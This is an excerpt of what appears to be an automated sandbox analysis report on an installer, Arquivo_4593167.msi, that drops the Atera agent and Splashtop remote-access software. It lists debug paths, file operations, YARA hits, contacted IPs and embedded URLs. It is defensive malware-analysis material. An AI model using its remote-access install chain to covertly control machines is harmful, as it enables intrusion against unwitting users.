                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbP source: rundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\CodeBases\isdev\Src\Runtime\InstallScript\ISBEW64\x64\Release\ISBEW64.pdb source: _isA1FD.exe, 00000028.00000000.2252067091.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000028.00000002.2255085096.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000029.00000002.2256104339.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000029.00000000.2252661620.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002A.00000000.2253370724.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002A.00000002.2256268057.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002B.00000002.2258725000.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002B.00000000.2255045633.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002C.00000000.2255937185.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002C.00000002.2259881834.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002D.00000002.2289803250.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002D.00000000.2257963587.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002E.00000002.2262306546.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002E.00000000.2259356144.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002F.00000002.2262839005.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002F.00000000.2260351966.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000030.00000002.2265092670.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000030.00000000.2261419648.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 
00000031.00000002.2267141038.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000031.00000000.2262303471.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit\net6.0-Release\System.Reflection.Emit.pdb source: System.Reflection.Emit.dll.1.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdbPf source: AgentPackageAgentInformation.exe, 00000014.00000002.1954998107.000001BE62A42000.00000002.00000001.01000000.00000018.sdmp
                                Source: Binary string: W.pdb$Gs0 source: PreVerCheck.exe, 00000025.00000002.2562182711.0000000000BF5000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: /_/artifacts/obj/System.Private.DataContractSerialization/net6.0-Release/System.Private.DataContractSerialization.pdb source: System.Private.DataContractSerialization.dll.1.dr
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Diagnostics.DiagnosticSource\net45\System.Diagnostics.DiagnosticSource.pdb source: System.Diagnostics.DiagnosticSource.dll1.24.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XDocument\net6.0-Release\System.Xml.XDocument.pdb source: System.Xml.XDocument.dll.1.dr
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: api-ms-win-core-localization-l1-2-0.dll.1.dr
                                Source: Binary string: System.Security.Cryptography.Cng.ni.pdb source: System.Security.Cryptography.Cng.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.CSharp\net6.0-windows-Release\Microsoft.CSharp.pdb source: Microsoft.CSharp.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net6.0\System.Text.Encodings.Web.pdbSHA256~f source: System.Text.Encodings.Web.dll0.24.dr
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdbSHA256 source: AteraAgent.exe, 0000000C.00000002.1792642291.000001C5E59A2000.00000002.00000001.01000000.00000011.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdb source: AteraAgent.exe, 0000000C.00000002.1792642291.000001C5E59A2000.00000002.00000001.01000000.00000011.sdmp, AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E74000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\ship\x86\SfxCA.pdb source: Arquivo_4593167.msi
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Tasks.Dataflow\net6.0-Release\System.Threading.Tasks.Dataflow.pdbRSDS source: System.Threading.Tasks.Dataflow.dll.1.dr
                                Source: Binary string: System.Data.Common.ni.pdb source: System.Data.Common.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\net6.0-Release\System.Runtime.Serialization.Json.pdbT*n* `*_CorDllMainmscoree.dll source: System.Runtime.Serialization.Json.dll.1.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Json\4.0.1.0\System.Runtime.Serialization.Json.pdb source: System.Runtime.Serialization.Json.dll.24.dr
                                Source: Binary string: c:\winddk\7600.16385.1\src\setup\difxapi\difxcmd\objfre_win7_x86\i386\DIFxCmd.pdb source: DIFxCmd.exe.1.dr
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.FileSystemGlobbing/Release/net6.0/Microsoft.Extensions.FileSystemGlobbing.pdbSHA256 source: Microsoft.Extensions.FileSystemGlobbing.dll.24.dr
                                Source: C:\Windows\Temp\SplashtopStreamer.exe Code function: 36_2_00406657 __EH_prolog3_GS,GetFullPathNameW,_DebugHeapAllocator,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,_DebugHeapAllocator, 36_2_00406657
                                Source: C:\Windows\Temp\SplashtopStreamer.exe Code function: 36_2_00428B20 _DebugHeapAllocator,_DebugHeapAllocator,FindFirstFileW,_DebugHeapAllocator,_DebugHeapAllocator,_DebugHeapAllocator,_DebugHeapAllocator,FindNextFileW,FindClose,_DebugHeapAllocator, 36_2_00428B20
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exe Code function: 37_2_00BBB1E5 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindClose, 37_2_00BBB1E5
                                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\
                                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\form-data\lib\
                                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\form-data\node_modules\
                                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\form-data\node_modules\async\lib\
                                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\form-data\node_modules\async\
                                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\form-data\

                                Networking

                                Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.119.152.241 443
                                Source: C:\Windows\SysWOW64\msiexec.exe Registry value created: NULL Service
                                Source: Yara match File source: 20.0.AgentPackageAgentInformation.exe.1be62230000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll, type: DROPPED
                                Source: Yara match File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, type: DROPPED
                                Source: Yara match File source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.dll, type: DROPPED
                                Source: Yara match File source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\netstandard.dll, type: DROPPED
                                Source: Yara match File source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.dll, type: DROPPED
                                Source: Yara match File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll, type: DROPPED
                                Source: Yara match File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, type: DROPPED
                                Source: Yara match File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll, type: DROPPED
                                Source: Yara match File source: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\choco.exe, type: DROPPED
                                Source: Joe Sandbox View IP Address: 40.119.152.241
                                Source: Joe Sandbox View IP Address: 35.157.63.228
                                Source: Joe Sandbox View IP Address: 13.35.58.124
                                Source: Joe Sandbox View ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEAGENTINFORMATION/37.9/AGENTPACKAGEAGENTINFORMATI
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEMONITORING/37.8/AGENTPACKAGEMONITORING.ZIP
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGESTREMOTE/23.4/AGENTPACKAGESTREMOTE.ZIP
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A09B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a6dc35606b2c6816e.awsglobalaccelerator.com
                                Source: AteraAgent.exe, 0000000C.00000000.1754536857.000001C5CB452000.00000002.00000001.01000000.0000000F.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA0FC1000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD15B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acontrol.atera.com/
                                Source: rundll32.exe, 00000004.00000002.1732615847.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA12FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.00000000046B5000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955362018.000001BE62D0F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CFA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CF6000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F651000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F68C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F6E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://agent-api.atera.com
                                Source: rundll32.exe, 00000004.00000002.1732615847.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA12FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.00000000046B5000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955362018.000001BE62D0F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CF6000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F651000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F68C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F6E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://atera-agent-api-eu.westeurope.cloudapp.azure.com
                                Source: AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9D10000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA298000.00000004.00000020.00020000.00000000.sdmp, PreVerCheck.exe, 00000025.00000002.2562182711.0000000000BF5000.00000002.00000001.01000000.0000001C.sdmp, Arquivo_4593167.msi, SRUsb.exe.1.dr, Microsoft.Win32.TaskScheduler.dll0.24.dr, System.Runtime.Serialization.Json.dll.24.dr, libssl-3.dll.1.dr, System.Diagnostics.Process.dll.24.dr, Microsoft.Extensions.FileSystemGlobbing.dll.24.dr, System.Runtime.InteropServices.dll.24.dr, System.Text.Encodings.Web.dll0.24.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                                Source: AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA15CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1283000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD2254000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2978322929.0000016BEA6E0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD21EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                                Source: AteraAgent.exe, 0000000C.00000002.1793099468.000001C5E5C8F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA055000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9C1A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA31E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA29C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976797117.0000016BEA38A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA204000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA309000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA2A2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 
00000018.00000002.2974355709.0000016BEA2CB000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A139000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A0B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt4.0.
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA309000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2978322929.0000016BEA6F6000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A139000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A0B9000.00000004.00000800.00020000.00000000.sdmp, PreVerCheck.exe, 00000025.00000002.2562182711.0000000000BF5000.00000002.00000001.01000000.0000001C.sdmp, Arquivo_4593167.msi, SRUsb.exe.1.dr, Microsoft.Win32.TaskScheduler.dll0.24.dr, System.Runtime.Serialization.Json.dll.24.dr, libssl-3.dll.1.dr, System.Diagnostics.Process.dll.24.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9720000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1956064131.000001BE7B4B8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA309000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA298000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2978322929.0000016BEA6F6000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E4D000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2203027448.000002E967DA9000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001F.00000003.2084912382.0000022D4CAAB000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 
0000001F.00000002.2087026675.0000022D4CADE000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001F.00000003.2085700686.0000022D4CADE000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001F.00000003.2084621827.0000022D4CAA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                                Source: xdnup.dll.1.dr, stdpms.cat.1.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9D10000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA298000.00000004.00000020.00020000.00000000.sdmp, PreVerCheck.exe, 00000025.00000002.2562182711.0000000000BF5000.00000002.00000001.01000000.0000001C.sdmp, Arquivo_4593167.msi, SRUsb.exe.1.dr, Microsoft.Win32.TaskScheduler.dll0.24.dr, System.Runtime.Serialization.Json.dll.24.dr, libssl-3.dll.1.dr, System.Diagnostics.Process.dll.24.dr, Microsoft.Extensions.FileSystemGlobbing.dll.24.dr, System.Runtime.InteropServices.dll.24.dr, System.Text.Encodings.Web.dll0.24.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
